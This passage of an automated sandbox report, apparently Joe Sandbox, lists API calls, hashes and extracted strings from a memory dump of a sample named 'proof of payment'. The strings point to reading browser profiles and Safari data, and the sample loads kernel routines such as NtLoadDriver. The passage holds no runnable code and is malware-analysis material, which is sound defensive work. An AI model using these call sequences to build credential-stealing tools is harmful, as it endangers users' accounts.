                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: NtdllProc_Window
                                      • String ID:
                                      • API String ID: 4255912815-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _wcsicmp.MSVCRT ref: 004022A6
                                      • _wcsicmp.MSVCRT ref: 004022D7
                                      • _wcsicmp.MSVCRT ref: 00402305
                                      • _wcsicmp.MSVCRT ref: 00402333
                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                        • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                      • memset.MSVCRT ref: 0040265F
                                      • memcpy.MSVCRT ref: 0040269B
                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                      • memcpy.MSVCRT ref: 004026FF
                                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                      • API String ID: 577499730-1134094380
                                      • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                      • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                      • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                      • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                      • String ID: :stringdata$ftp://$http://$https://
                                      • API String ID: 2787044678-1921111777
                                      • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                      • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                      • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                      • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                      • GetWindowRect.USER32(?,?), ref: 00414088
                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                      • GetDC.USER32 ref: 004140E3
                                      • wcslen.MSVCRT ref: 00414123
                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                      • ReleaseDC.USER32(?,?), ref: 00414181
                                      • _snwprintf.MSVCRT ref: 00414244
                                      • SetWindowTextW.USER32(?,?), ref: 00414258
                                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                      • GetClientRect.USER32(?,?), ref: 004142E1
                                      • GetWindowRect.USER32(?,?), ref: 004142EB
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                      • GetClientRect.USER32(?,?), ref: 0041433B
                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                      • String ID: %s:$EDIT$STATIC
                                      • API String ID: 2080319088-3046471546
                                      • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                      • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • EndDialog.USER32(?,?), ref: 00413221
                                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                      • memset.MSVCRT ref: 00413292
                                      • memset.MSVCRT ref: 004132B4
                                      • memset.MSVCRT ref: 004132CD
                                      • memset.MSVCRT ref: 004132E1
                                      • memset.MSVCRT ref: 004132FB
                                      • memset.MSVCRT ref: 00413310
                                      • GetCurrentProcess.KERNEL32 ref: 00413318
                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                      • memset.MSVCRT ref: 004133C0
                                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                      • memcpy.MSVCRT ref: 004133FC
                                      • wcscpy.MSVCRT ref: 0041341F
                                      • _snwprintf.MSVCRT ref: 0041348E
                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                      • SetFocus.USER32(00000000), ref: 004134B7
                                      Strings
                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                      • {Unknown}, xrefs: 004132A6
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                      • API String ID: 4111938811-1819279800
                                      • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                      • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                      • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                      • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                      • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                      • EndDialog.USER32(?,?), ref: 0040135E
                                      • DeleteObject.GDI32(?), ref: 0040136A
                                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                      • ShowWindow.USER32(00000000), ref: 00401398
                                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                      • ShowWindow.USER32(00000000), ref: 004013A7
                                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                      • String ID:
                                      • API String ID: 829165378-0
                                      • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                      • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 00404172
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                      • wcscpy.MSVCRT ref: 004041D6
                                      • wcscpy.MSVCRT ref: 004041E7
                                      • memset.MSVCRT ref: 00404200
                                      • memset.MSVCRT ref: 00404215
                                      • _snwprintf.MSVCRT ref: 0040422F
                                      • wcscpy.MSVCRT ref: 00404242
                                      • memset.MSVCRT ref: 0040426E
                                      • memset.MSVCRT ref: 004042CD
                                      • memset.MSVCRT ref: 004042E2
                                      • _snwprintf.MSVCRT ref: 004042FE
                                      • wcscpy.MSVCRT ref: 00404311
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                      • API String ID: 2454223109-1580313836
                                      • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                      • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                      • SetMenu.USER32(?,00000000), ref: 00411453
                                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                      • memcpy.MSVCRT ref: 004115C8
                                      • ShowWindow.USER32(?,?), ref: 004115FE
                                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                      • API String ID: 4054529287-3175352466
                                      • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                      • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                      • API String ID: 667068680-2887671607
                                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                      • API String ID: 1607361635-601624466
                                      • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                      • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                      • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                      • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _snwprintf$memset$wcscpy
                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                      • API String ID: 2000436516-3842416460
                                      • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                      • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                      • String ID:
                                      • API String ID: 1043902810-0
                                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                      • memset.MSVCRT ref: 0040E380
                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                        • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                      • wcschr.MSVCRT ref: 0040E3B8
                                      • memcpy.MSVCRT ref: 0040E3EC
                                      • memcpy.MSVCRT ref: 0040E407
                                      • memcpy.MSVCRT ref: 0040E422
                                      • memcpy.MSVCRT ref: 0040E43D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                      • API String ID: 3073804840-2252543386
                                      • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                      • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??2@??3@_snwprintfwcscpy
                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                      • API String ID: 2899246560-1542517562
                                      • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                      • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                      • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                      • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 0040DBCD
                                      • memset.MSVCRT ref: 0040DBE9
                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                        • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                        • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                        • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                      • wcscpy.MSVCRT ref: 0040DC2D
                                      • wcscpy.MSVCRT ref: 0040DC3C
                                      • wcscpy.MSVCRT ref: 0040DC4C
                                      • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                      • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                      • wcscpy.MSVCRT ref: 0040DCC3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                      • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                      • API String ID: 3330709923-517860148
                                      • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                      • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                      • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                      • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      • memset.MSVCRT ref: 004085CF
                                      • memset.MSVCRT ref: 004085F1
                                      • memset.MSVCRT ref: 00408606
                                      • strcmp.MSVCRT ref: 00408645
                                      • _mbscpy.MSVCRT ref: 004086DB
                                      • _mbscpy.MSVCRT ref: 004086FA
                                      • memset.MSVCRT ref: 0040870E
                                      • strcmp.MSVCRT ref: 0040876B
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                      • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                      • String ID: ---
                                      • API String ID: 3437578500-2854292027
                                      • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
